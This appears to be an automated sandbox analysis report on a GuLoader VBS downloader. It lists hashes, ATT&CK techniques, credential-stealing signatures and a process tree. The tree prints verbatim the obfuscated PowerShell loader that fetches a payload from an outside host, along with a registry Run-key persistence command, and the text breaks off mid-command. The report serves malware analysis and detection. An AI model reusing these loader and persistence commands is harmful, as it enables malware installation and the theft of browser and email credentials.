guloader | 49ac2bd071278bff265df4bdc78ceb6df0377e70cc641c1e467e8911f40cfff8

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 01:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

60e73302aa1c9b118dd3241d145d4978aa3ecb2b1cc81a4fee726b8a53f14586.vbs
Size

26KB
MD5

a14f70e58dc02789178f80a84d376565
SHA1

8c5f30da39b24e0b8c2aefe11b7fba636fd97c58
SHA256

60e73302aa1c9b118dd3241d145d4978aa3ecb2b1cc81a4fee726b8a53f14586
SHA512

4a9021dd54aba2d2f423b9015130caf4efc83344a5880b0314e2c92016eaa061be02f63d069dda3bc8d3e73d8f0449a78480bb14a443c5647987547167276872
SSDEEP

384:zIX8qoFQo1i2j+dDGrEJ2a0n+qkXcs6kamFqz:z88Xao1i2aDGg2alVXnamgz

Score

10^/10

guloader collection credential_access defense_evasion discovery downloader persistence privilege_escalation stealer

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/5032-57-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3328-54-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/2156-53-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3328-54-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2156-53-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
4	4544	WScript.exe
42	1004	powershell.exe
44	1004	powershell.exe
48	1004	powershell.exe
86	1716	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Envoyeerne = "%Depraved% -w 1 $Bonevoks=(Get-ItemProperty -Path 'HKCU:\\Cerebellifugal\\').Periostea;%Depraved% ($Bonevoks)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
824	wab.exe
824	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
824	wab.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 824 set thread context of 2156	824	wab.exe	108
PID 824 set thread context of 3328	824	wab.exe	109
PID 824 set thread context of 5032	824	wab.exe	110

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
1716	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3316	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1004	powershell.exe
1004	powershell.exe
2156	wab.exe
2156	wab.exe
5032	wab.exe
5032	wab.exe
2156	wab.exe
2156	wab.exe
1716	powershell.exe
1716	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
824	wab.exe
824	wab.exe
824	wab.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	5032	wab.exe
Token: SeDebugPrivilege	1716	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
824	wab.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4544 wrote to memory of 1004	4544	WScript.exe	96
PID 4544 wrote to memory of 1004	4544	WScript.exe	96
PID 1004 wrote to memory of 2912	1004	powershell.exe	98
PID 1004 wrote to memory of 2912	1004	powershell.exe	98
PID 1004 wrote to memory of 760	1004	powershell.exe	100
PID 1004 wrote to memory of 760	1004	powershell.exe	100
PID 1004 wrote to memory of 760	1004	powershell.exe	100
PID 824 wrote to memory of 3856	824	wab.exe	104
PID 824 wrote to memory of 3856	824	wab.exe	104
PID 824 wrote to memory of 3856	824	wab.exe	104
PID 3856 wrote to memory of 3316	3856	cmd.exe	106
PID 3856 wrote to memory of 3316	3856	cmd.exe	106
PID 3856 wrote to memory of 3316	3856	cmd.exe	106
PID 824 wrote to memory of 1804	824	wab.exe	107
PID 824 wrote to memory of 1804	824	wab.exe	107
PID 824 wrote to memory of 1804	824	wab.exe	107
PID 824 wrote to memory of 2156	824	wab.exe	108
PID 824 wrote to memory of 2156	824	wab.exe	108
PID 824 wrote to memory of 2156	824	wab.exe	108
PID 824 wrote to memory of 2156	824	wab.exe	108
PID 824 wrote to memory of 3328	824	wab.exe	109
PID 824 wrote to memory of 3328	824	wab.exe	109
PID 824 wrote to memory of 3328	824	wab.exe	109
PID 824 wrote to memory of 3328	824	wab.exe	109
PID 824 wrote to memory of 5032	824	wab.exe	110
PID 824 wrote to memory of 5032	824	wab.exe	110
PID 824 wrote to memory of 5032	824	wab.exe	110
PID 824 wrote to memory of 5032	824	wab.exe	110
PID 1804 wrote to memory of 1716	1804	WScript.exe	122
PID 1804 wrote to memory of 1716	1804	WScript.exe	122
PID 1804 wrote to memory of 1716	1804	WScript.exe	122
PID 1716 wrote to memory of 2156	1716	powershell.exe	124
PID 1716 wrote to memory of 2156	1716	powershell.exe	124
PID 1716 wrote to memory of 2156	1716	powershell.exe	124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\60e73302aa1c9b118dd3241d145d4978aa3ecb2b1cc81a4fee726b8a53f14586.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Rimeligheden Traumaer46 Octacnemus Sabbatsaftener Pikkes Malcolm Dommeren Newline Indstuderings Slvprops Fiffikusernes24 Unmarbleized Bankfuldmaegtig Transients appeldomstols Elverpige overskggenes Koreograf Uncargoed Nonreviewable Triactinal Plowboy Redningstjeneste Soldaterudskrivningens Rimeligheden Traumaer46 Octacnemus Sabbatsaftener Pikkes Malcolm Dommeren Newline Indstuderings Slvprops Fiffikusernes24 Unmarbleized Bankfuldmaegtig Transients appeldomstols Elverpige overskggenes Koreograf Uncargoed Nonreviewable Triactinal Plowboy Redningstjeneste Soldaterudskrivningens';If (${host}.CurrentCulture) {$Metallifacture='SUBsTR';$Gennemsyns++;}$Metallifacture+='ing';Function cardamom($Morbiditeternes){$Legater=$Morbiditeternes.Length-$Gennemsyns;For( $Udvejningsvgt=2;$Udvejningsvgt -lt $Legater;$Udvejningsvgt+=3){$Rimeligheden+=$Morbiditeternes.$Metallifacture.'Invoke'( $Udvejningsvgt, $Gennemsyns);}$Rimeligheden;}function Fredningsstyrelsernes($Udvejningsvgtmrahil){ & ($Frivagten) ($Udvejningsvgtmrahil);}$ancodont=cardamom 'StMdioG zGri,ulTelexaUd/ ,5 S.v 0Sn ,f( ,WS,iUbnDrd ho ow.ysDa StNAnTdr M.1 d0 D. n0Po;Ac GWS.ip.n.r6 c4N ; h SkxD.6,p4B ;Ch EnrFlvSo:St1 E2Ta1 u.re0cr).n .vG eRecovk,io.i/.u2Pi0Un1Ud0Gd0 F1ud0Gs1 . CoFs.iPrrVaePufG oFlx ,/We1.u2Kl1Bl. 0N. ';$Fluctisonant=cardamom ' ,UPisCae rBe-VeAPagCae.nnskt , ';$Pikkes=cardamom 'Olh,ut ,t.lp Ts T:Ca/An/ Cw,peS lR,cCao Rm Ms.dpFllUluMisM..garViust/.vw BpKr-,ra,ld .m.ai ,nDi/ vuUnsSee,o/ReTI ik,dInsDibMoeNugtorK nB sT,eG.dH,e F..co AcUlxti>Ndh,ntSytHrpHa:.r/ba/Dlc NpM.a un eeHolTo- SaSkd im FishnFuhBooDosAftPh. TcHeoSemS./TeTToi .d jsVobPeeChgEurU nFasc.eBud,ue ,.DeoolcT x I ';$Lamplit57=cardamom ' R> S ';$Frivagten=cardamom 'P iL,e.nx.i ';$Longwords='Newline';$partialises = cardamom 'LeeMoc.dhFio E De%A,a pRep AdAga ptFoaRi%Ey\,uGoplHii raPr.AvBQ oTag v .t&Bo&p. .he,ec Mh,aoT UdtGi ';Fredningsstyrelsernes (cardamom 'Pa$.ug ElS oGebReaOvlWi:SaSFoe,up haskr aPltDiiAao MnB eSer s .=Or(Rec,omBedKa ,l/MecDe Fo$PrpFlaAmrGot uiFaaEplAri isCreSls K)B ');Fredningsstyrelsernes (cardamom 'Uf$UngSklUno,obU,aFelFo:O,S gaFabWabBoaSut OsEfaPlf,at re angiePer o=Sp$sePlai.nkTekF,e NsTa. usMapSwl eiCutRo(V,$GrLD,aFlm,apPhlViiMot C5cy7 A) , ');Fredningsstyrelsernes (cardamom 'Ma[ .NGae ,t .. KS ReWor.ov LiDac,aeDeP.so TiSan.ntS.MReaL.naca Bg .eNvrR.] .:G,: PSF,eHocPouP.rU,iTht Sy CP.lrBoo tdrosic,oo KlSt ,= u Am[.tNNoeMatMb. ESPae UcAuu,lrK iOmtD,yR,P Mr Vop tU.oM cVaoBrlTrTHuy.op EeU ] p:Ex:P TPalAnsFe1 S2so ');$Pikkes=$Sabbatsaftener[0];$Choirlike= (cardamom ' R$VegIll uo.rbOva .lUn:.rD.iiLasSpsLaop gfle AnSvyH,=TaNS.eTewA -H O Fb .j edecaltFi UfS ,y Rs t ae,gmpi.A,NCre,et ..TeW eLibB.C l,ai AeU.nAdt');$Choirlike+=$Separationers[1];Fredningsstyrelsernes ($Choirlike);Fredningsstyrelsernes (cardamom 'V,$ RDS.iVas SsRooTogR eScnNuy.o.NoHO,e Ea td WeAfrPrsRd[Ch$ TFBrl.ou ocvatUdi osSko.anAfaNonRot F]M = H$Noa .nB cAdoUvdPsoS,n Mt r ');$Cytologien130=cardamom ' e$ .D Ai,ns,isJaoOug neHan,nyL ..kDBro rwR nJol Uo AaEmdPaF,viPal esa(Pa$BaPhiiC kTok.ueElsNe,Ko$.aPEplj,o wPibPio ,y K)ou ';$Plowboy=$Separationers[0];Fredningsstyrelsernes (cardamom ' $Sng al,uoUnb aaCalTa:goSBij ,o,if ,e,rl.tiAnsF,tS.eSirScnChe TsO.=Aa( iTUmegysFit e-b,PD,aMitU,hIn .o$ .P BlSooPrw PbUdoHjyVi)Mi ');while (!$Sjofelisternes) {Fredningsstyrelsernes (cardamom ' R$Stg DlF.o cbA.aSul.o: SSUbu MbVal ,a atamerrrFoaS.lg.= a$P.tDerInuSme D ') ;Fredningsstyrelsernes $Cytologien130;Fredningsstyrelsernes (cardamom ' SST,tRoaOmrFlt,y-.ySVelC,ekleH,pEt Uh4.e ');Fredningsstyrelsernes (cardamom 'D,$c gHilO.o.abPaaS l N:CaSCojTloTafe,e,alHeiWasMetSye IrAfnLoe Bs U= P(F T e CsInt,g-NoPBeaIntZohPo ,$ AP,ylReo w obSuoV,ySt) J ') ;Fredningsstyrelsernes (cardamom 'Fo$KogSilA.oOpb ,aUnl B: .O ocn.tHya.hc,vnN.e rmTau,ksI =Le$.vgTrl.koScbD,aDdlD,:UnT Tr,aaf.u UmBja ,eB rAr4 6 E+ + e%N.$GoSPra Sb SbFra BtSys.uaDefDetDiea.nUle ,rF .CacKkoPruUgn ,tWi ') ;$Pikkes=$Sabbatsaftener[$Octacnemus];}$Fiskeriinteresserne=333020;$Hovedskallerne=28685;Fredningsstyrelsernes (cardamom '.r$DegAplleo.abDiaS.lFo:oxIChnW dsus Bt ,uS.d.oeLorFoi,rnSigGasPi st=F, A GfoeTrt ,-AlC FoChn RtBeeU,n .t O Co$ArP qlA o nw.ib.roDay u ');Fredningsstyrelsernes (cardamom ',i$ BgBrl Po ob yaAflCo: UNP o,kn IcCeoKrnShd .uBicBitRao er bsFa Re= . L,[CaSH,yPes nt IeFam S. AC.oo AnBevT,eHorGutMa] l:A.:,aFBurF.oS,m mBW,aEmsOrePr6 U4OpSSatFur iDon .g,s(Ge$ SIBrnAldShsLgtDeu Sdf.eEprHii,lnhagL.sPa)Na ');Fredningsstyrelsernes (cardamom 'Ov$S gTilG,oTub oa el i:MiUC.n.lmHaaBar b xl eeDuiObzMaeAdd . B =t [T,SThyK s HtKle.tm n.MiT,ee HxhetK .S,EChn ,c Ao,ud Mi nk.g k]Ri:I,:JaACoSG CSaIH.INa.DaGVreMutM.S ,t urS iKun,agTa(K.$c.NPro nDicCoo AntrdL.u,ncCatHvoUrr,ps,e) ');Fredningsstyrelsernes (cardamom ' U$TrgDel aoLybsma,al :G,BPalSciSynladF.ep d .e RsGa=.d$.uU.ungrmF.a ,rLubBilbreT,iTiz ,eQudMi.Kos ,uYobHasPet SrReiMon og .(,v$ UFB iL s VkHie ArL iSaif nStt UeS.rWieJ.sV sDie or,sn Ue u,Pt$AfHVaoPav.heShdAfsPukb,a .l HlF e Br anRae )Tr ');Fredningsstyrelsernes $Blindedes;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1004
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Glia.Bog && echo t"
    3⤵
    PID:2912
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Rimeligheden Traumaer46 Octacnemus Sabbatsaftener Pikkes Malcolm Dommeren Newline Indstuderings Slvprops Fiffikusernes24 Unmarbleized Bankfuldmaegtig Transients appeldomstols Elverpige overskggenes Koreograf Uncargoed Nonreviewable Triactinal Plowboy Redningstjeneste Soldaterudskrivningens Rimeligheden Traumaer46 Octacnemus Sabbatsaftener Pikkes Malcolm Dommeren Newline Indstuderings Slvprops Fiffikusernes24 Unmarbleized Bankfuldmaegtig Transients appeldomstols Elverpige overskggenes Koreograf Uncargoed Nonreviewable Triactinal Plowboy Redningstjeneste Soldaterudskrivningens';If (${host}.CurrentCulture) {$Metallifacture='SUBsTR';$Gennemsyns++;}$Metallifacture+='ing';Function cardamom($Morbiditeternes){$Legater=$Morbiditeternes.Length-$Gennemsyns;For( $Udvejningsvgt=2;$Udvejningsvgt -lt $Legater;$Udvejningsvgt+=3){$Rimeligheden+=$Morbiditeternes.$Metallifacture.'Invoke'( $Udvejningsvgt, $Gennemsyns);}$Rimeligheden;}function Fredningsstyrelsernes($Udvejningsvgtmrahil){ & ($Frivagten) ($Udvejningsvgtmrahil);}$ancodont=cardamom 'StMdioG zGri,ulTelexaUd/ ,5 S.v 0Sn ,f( ,WS,iUbnDrd ho ow.ysDa StNAnTdr M.1 d0 D. n0Po;Ac GWS.ip.n.r6 c4N ; h SkxD.6,p4B ;Ch EnrFlvSo:St1 E2Ta1 u.re0cr).n .vG eRecovk,io.i/.u2Pi0Un1Ud0Gd0 F1ud0Gs1 . CoFs.iPrrVaePufG oFlx ,/We1.u2Kl1Bl. 0N. ';$Fluctisonant=cardamom ' ,UPisCae rBe-VeAPagCae.nnskt , ';$Pikkes=cardamom 'Olh,ut ,t.lp Ts T:Ca/An/ Cw,peS lR,cCao Rm Ms.dpFllUluMisM..garViust/.vw BpKr-,ra,ld .m.ai ,nDi/ vuUnsSee,o/ReTI ik,dInsDibMoeNugtorK nB sT,eG.dH,e F..co AcUlxti>Ndh,ntSytHrpHa:.r/ba/Dlc NpM.a un eeHolTo- SaSkd im FishnFuhBooDosAftPh. TcHeoSemS./TeTToi .d jsVobPeeChgEurU nFasc.eBud,ue ,.DeoolcT x I ';$Lamplit57=cardamom ' R> S ';$Frivagten=cardamom 'P iL,e.nx.i ';$Longwords='Newline';$partialises = cardamom 'LeeMoc.dhFio E De%A,a pRep AdAga ptFoaRi%Ey\,uGoplHii raPr.AvBQ oTag v .t&Bo&p. .he,ec Mh,aoT UdtGi ';Fredningsstyrelsernes (cardamom 'Pa$.ug ElS oGebReaOvlWi:SaSFoe,up haskr aPltDiiAao MnB eSer s .=Or(Rec,omBedKa ,l/MecDe Fo$PrpFlaAmrGot uiFaaEplAri isCreSls K)B ');Fredningsstyrelsernes (cardamom 'Uf$UngSklUno,obU,aFelFo:O,S gaFabWabBoaSut OsEfaPlf,at re angiePer o=Sp$sePlai.nkTekF,e NsTa. usMapSwl eiCutRo(V,$GrLD,aFlm,apPhlViiMot C5cy7 A) , ');Fredningsstyrelsernes (cardamom 'Ma[ .NGae ,t .. KS ReWor.ov LiDac,aeDeP.so TiSan.ntS.MReaL.naca Bg .eNvrR.] .:G,: PSF,eHocPouP.rU,iTht Sy CP.lrBoo tdrosic,oo KlSt ,= u Am[.tNNoeMatMb. ESPae UcAuu,lrK iOmtD,yR,P Mr Vop tU.oM cVaoBrlTrTHuy.op EeU ] p:Ex:P TPalAnsFe1 S2so ');$Pikkes=$Sabbatsaftener[0];$Choirlike= (cardamom ' R$VegIll uo.rbOva .lUn:.rD.iiLasSpsLaop gfle AnSvyH,=TaNS.eTewA -H O Fb .j edecaltFi UfS ,y Rs t ae,gmpi.A,NCre,et ..TeW eLibB.C l,ai AeU.nAdt');$Choirlike+=$Separationers[1];Fredningsstyrelsernes ($Choirlike);Fredningsstyrelsernes (cardamom 'V,$ RDS.iVas SsRooTogR eScnNuy.o.NoHO,e Ea td WeAfrPrsRd[Ch$ TFBrl.ou ocvatUdi osSko.anAfaNonRot F]M = H$Noa .nB cAdoUvdPsoS,n Mt r ');$Cytologien130=cardamom ' e$ .D Ai,ns,isJaoOug neHan,nyL ..kDBro rwR nJol Uo AaEmdPaF,viPal esa(Pa$BaPhiiC kTok.ueElsNe,Ko$.aPEplj,o wPibPio ,y K)ou ';$Plowboy=$Separationers[0];Fredningsstyrelsernes (cardamom ' $Sng al,uoUnb aaCalTa:goSBij ,o,if ,e,rl.tiAnsF,tS.eSirScnChe TsO.=Aa( iTUmegysFit e-b,PD,aMitU,hIn .o$ .P BlSooPrw PbUdoHjyVi)Mi ');while (!$Sjofelisternes) {Fredningsstyrelsernes (cardamom ' R$Stg DlF.o cbA.aSul.o: SSUbu MbVal ,a atamerrrFoaS.lg.= a$P.tDerInuSme D ') ;Fredningsstyrelsernes $Cytologien130;Fredningsstyrelsernes (cardamom ' SST,tRoaOmrFlt,y-.ySVelC,ekleH,pEt Uh4.e ');Fredningsstyrelsernes (cardamom 'D,$c gHilO.o.abPaaS l N:CaSCojTloTafe,e,alHeiWasMetSye IrAfnLoe Bs U= P(F T e CsInt,g-NoPBeaIntZohPo ,$ AP,ylReo w obSuoV,ySt) J ') ;Fredningsstyrelsernes (cardamom 'Fo$KogSilA.oOpb ,aUnl B: .O ocn.tHya.hc,vnN.e rmTau,ksI =Le$.vgTrl.koScbD,aDdlD,:UnT Tr,aaf.u UmBja ,eB rAr4 6 E+ + e%N.$GoSPra Sb SbFra BtSys.uaDefDetDiea.nUle ,rF .CacKkoPruUgn ,tWi ') ;$Pikkes=$Sabbatsaftener[$Octacnemus];}$Fiskeriinteresserne=333020;$Hovedskallerne=28685;Fredningsstyrelsernes (cardamom '.r$DegAplleo.abDiaS.lFo:oxIChnW dsus Bt ,uS.d.oeLorFoi,rnSigGasPi st=F, A GfoeTrt ,-AlC FoChn RtBeeU,n .t O Co$ArP qlA o nw.ib.roDay u ');Fredningsstyrelsernes (cardamom ',i$ BgBrl Po ob yaAflCo: UNP o,kn IcCeoKrnShd .uBicBitRao er bsFa Re= . L,[CaSH,yPes nt IeFam S. AC.oo AnBevT,eHorGutMa] l:A.:,aFBurF.oS,m mBW,aEmsOrePr6 U4OpSSatFur iDon .g,s(Ge$ SIBrnAldShsLgtDeu Sdf.eEprHii,lnhagL.sPa)Na ');Fredningsstyrelsernes (cardamom 'Ov$S gTilG,oTub oa el i:MiUC.n.lmHaaBar b xl eeDuiObzMaeAdd . B =t [T,SThyK s HtKle.tm n.MiT,ee HxhetK .S,EChn ,c Ao,ud Mi nk.g k]Ri:I,:JaACoSG CSaIH.INa.DaGVreMutM.S ,t urS iKun,agTa(K.$c.NPro nDicCoo AntrdL.u,ncCatHvoUrr,ps,e) ');Fredningsstyrelsernes (cardamom ' U$TrgDel aoLybsma,al :G,BPalSciSynladF.ep d .e RsGa=.d$.uU.ungrmF.a ,rLubBilbreT,iTiz ,eQudMi.Kos ,uYobHasPet SrReiMon og .(,v$ UFB iL s VkHie ArL iSaif nStt UeS.rWieJ.sV sDie or,sn Ue u,Pt$AfHVaoPav.heShdAfsPukb,a .l HlF e Br anRae )Tr ');Fredningsstyrelsernes $Blindedes;"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Glia.Bog && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4924
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:824
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Envoyeerne" /t REG_EXPAND_SZ /d "%Depraved% -w 1 $Bonevoks=(Get-ItemProperty -Path 'HKCU:\Cerebellifugal\').Periostea;%Depraved% ($Bonevoks)"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3856
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Envoyeerne" /t REG_EXPAND_SZ /d "%Depraved% -w 1 $Bonevoks=(Get-ItemProperty -Path 'HKCU:\Cerebellifugal\').Periostea;%Depraved% ($Bonevoks)"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3316
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Trekanterne174.vbs"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1804
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene';If (${host}.CurrentCulture) {$Ruefulness='SUBsTR';$Danmarksmestrenes++;}$Ruefulness+='ing';Function semisavage($Semicultivated){$Attesterer=$Semicultivated.Length-$Danmarksmestrenes;For( $Saetningsblok=2;$Saetningsblok -lt $Attesterer;$Saetningsblok+=3){$Deaktivering250+=$Semicultivated.$Ruefulness.'Invoke'( $Saetningsblok, $Danmarksmestrenes);}$Deaktivering250;}function bagstagets($Mirrorise){ . ($Fetichize) ($Mirrorise);}$Nedtrappedes=semisavage 'AfM,eoVezMiiF,lB lAra ,/ S5In.Ko0Af Fe(EuWDei DnredN,oJaw,tsFi .uNSaTR. U1 .0Ha.He0Si; K BaW riTjnMa6 f4ko;Re LaxL.6 K4Be; , urChv.a: ,1Ov2He1,a. M0Re) u SoGBeeL,cBlkKroPr/M.2,o0 ,1 .0 0 E1Ap0 B1St TrFCri,irBeePefr o NxBe/Un1Re2Wi1Mi.Im0Fo ';$Speronaros33=semisavage ' .UAdsCheSurWa- OARigD e OnClt ';$Ischiovertebral=semisavage 'W.hN.t tF.pDusB.:In/ru/,twFoe Kl Occlo Um DsSlpMalHyuHasEn.Unr BuSk/G wMipSt-KoaM,d Sm oiRanA./Chu Bs,fe Ur .s.e/p MSviGdj Ua c.BofInlW.aPr ';$Badeomraaderne=semisavage 'U > L ';$Fetichize=semisavage 'Udi ,e NxNo ';$Chromocyte='Pagterne';$Dysgenical = semisavage 'SceSkcTrhPeo , ,l%DeaRepF,p AdWiaObtSkaAn%.h\,iPDoo usTrhSooTo..rSF gsasB, Mo&Ve& D .eD,cAshhao,i Yht h ';bagstagets (semisavage ' E$K gRelS,o,fbBea ylLe: D.te r.ciSte ,t u=Me(L.c Sm TdSt Ud/SycRu Un$H,D AyGrsCrgCoeTunCaiFecVaaB lA )Gt ');bagstagets (semisavage 'St$StgRilT,oSabtoaSilAn: JB wu FsV,bGloTayR.=Ge$ lIBysr,cKrhSti doAhvMae ErTot eEdbl rRaaQdlHy. LsOopSklKoiA,tTo(,l$M,BN aNudFleKroPemTorUnaSaa Ad .eOvrFenH,e.a)G. ');bagstagets (semisavage 'Un[ ,N FeI t.n.F.S.xeU,rIsvReiAtcIde .PBlo PiWenMatSmM NaU,n aaPeg ,eBerEp]Be:Ha:DrSlaeOpcStuStrRei Ft,iyDePSur ,oLatBloVicsyo FlS, S=,a Hu[ .NBleUnt S.ErSP eAuc LuI.rekiEst iyDrPSpr Bo Dt LoStcT,osulP.TFryKwpPle o]Un:U :hoT RlXas D1.e2 R ');$Ischiovertebral=$Busboy[0];$pvc= (semisavage 'pa$Kog SlLio ,bScas lTh:a.SBiehac.urP euntN iEun.esPi=PeNFreLowUn- UOOvb.ej.telocSatE. ImSL.yS s Pt Me mdo. N reent J.HnWPreI,bsuCA,lD i LeDenVgt');$pvc+=$Deriet[1];bagstagets ($pvc);bagstagets (semisavage 'E.$InSFieFecBarOpe RtEli anExsSi.AdHmiePha rdBle,er Bs,a[Fl$DeSCopAseG rNeoSknFoaD,rReoAssRa3ph3Ur] P=Ka$NoN.oe ,dU t SrAsaplpb,p .eAadSueDesFu ');$Fnernes=semisavage 'ag$p,S Le Sc .r neLft iSun MsBe.muDStoSkwPhnPrlh,oTnaSwdHaFgui MlBee i(,n$UdI,lsEpcBih PiHaoNivM e MrE.tBres.bHvrGaaKnl .,em$ TL,kaForD.mbrs.f) . ';$Larms=$Deriet[0];bagstagets (semisavage 'Ma$S.gInlAloW.b yaE.lKo: SS.oeC lT vOpmStoledEqsSliHagUneMolAisoseL.s .=Ju(umTU eP,sOvt.k-UnP UaD,tRehPr No$siL .a ,rF,mRusH.)El ');while (!$Selvmodsigelses) {bagstagets (semisavage 'Pa$ HgLol.toOfb Pa.ylKr:SeH UuSarFrtHafChuRelti=.u$ ,tE,r gupeeVi ') ;bagstagets 